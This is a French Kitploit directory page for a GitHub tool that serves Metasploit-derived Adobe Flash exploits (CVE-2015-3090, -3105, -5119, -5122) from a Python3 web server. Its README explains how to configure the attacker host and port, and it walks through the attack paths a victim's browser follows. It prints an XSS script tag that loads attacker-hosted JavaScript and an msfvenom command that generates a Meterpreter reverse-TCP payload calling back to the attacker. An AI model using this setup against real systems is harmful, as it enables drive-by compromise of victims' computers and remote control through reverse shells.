Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/xattam1/adobe-flash-exploits_17-18
Frameworks d'ExploitationGénération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubxattam1/adobe-flash-exploits_17-18

Adobe-Flash-Exploits_17-18

Convertis des exploits Metasploit pour les vulnérabilités Adobe Flash CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 et CVE-2015-5122 en script Python3.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
1il y a 4 ansPas encore vérifié

Script Python3 pour les exploits Adobe Flash CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 et CVE-2015-5122

Exploits Metasploit convertis pour les vulnérabilités Adobe Flash CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 et CVE-2015-5122 en un script Python3.

Informations

Ce script hébergera un serveur web pouvant exploiter une des vulnérabilités Adobe Flash suivantes à la fois :

  1. CVE-2015-3090
  2. CVE-2015-3105
  3. CVE-2015-5119
  4. CVE-2015-5122

Exécution

Vous devez apporter des modifications (décrites ici) à exploit.py pour l’adapter à vos besoins.

Modifications

  • hostname = "192.168.1.100"
    • Il s’agit d’une IP sur le système attaquant qui hébergera le serveur web d’exploitation.
  • serverPort = 8080
    • Il s’agit du port sur le système attaquant qui hébergera le serveur web d’exploitation.
  • xss = False
    • Si défini sur True, la première requête de la victime au serveur est traitée comme du JavaScript :
      • Exemple d’injection XSS :
        • <script src="http://192.168.1.100:8080/"></script>
      • Chemin d’attaque :
        • Requête de la victime 1 -> Serveur vulnérable XSS :
          • La victime accède à une injection XSS sur un serveur distant qui demande un fichier JavaScript (voir requête 2).
        • Requête de la victime 2 -> Source JavaScript sur le système attaquant.
        • Requête de la victime 3 -> Fichier swf malveillant.
    • Si défini sur False, la première requête de la victime au serveur est traitée comme du HTML :
      • Exemple :
        • http://192.168.1.100:8080/
      • Chemin d’attaque :
        • Requête de la victime 1 -> Fichier HTML sur le système attaquant.
        • Requête de la victime 2 -> Fichier swf malveillant.
  • base64Payload = "..."
    • Il s’agit de la charge utile en base64 qui sera exécutée sur le système victime.
    • Modifiez l’exemple de commande ci-dessous pour l’adapter à vos besoins et générez votre charge utile :
      • Exemple :
        • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 | base64
      • Note : La seule charge utile qui a fonctionné pour moi est windows/meterpreter/reverse_tcp.

  • swfFile = swfFileList['37368']
    • Sélectionnez le fichier swf d’exploitation Adobe Flash à utiliser pour exploiter le système victime :
      • root@kitploit:~
        swfFileList = {
            '37368': 'CVE-2015-3090.swf',
            '37448': 'CVE-2015-3105.swf',
            '37523': 'CVE-2015-5119.swf',
            '37599': 'CVE-2015-5122.swf'
        }
        

Exécution

Exécutez la commande suivante, dans le même répertoire que les fichiers swf malveillants, pour lancer le script d’exploitation Adobe Flash :

  • python3 exploit.py

Références :

CVE-2015-3090 -> https://exploit-db.com/exploits/37368

CVE-2015-3105 -> https://exploit-db.com/exploits/37448

CVE-2015-5119 -> https://exploit-db.com/exploits/37523

CVE-2015-5122 -> https://exploit-db.com/exploits/37599

Télécharger l’outil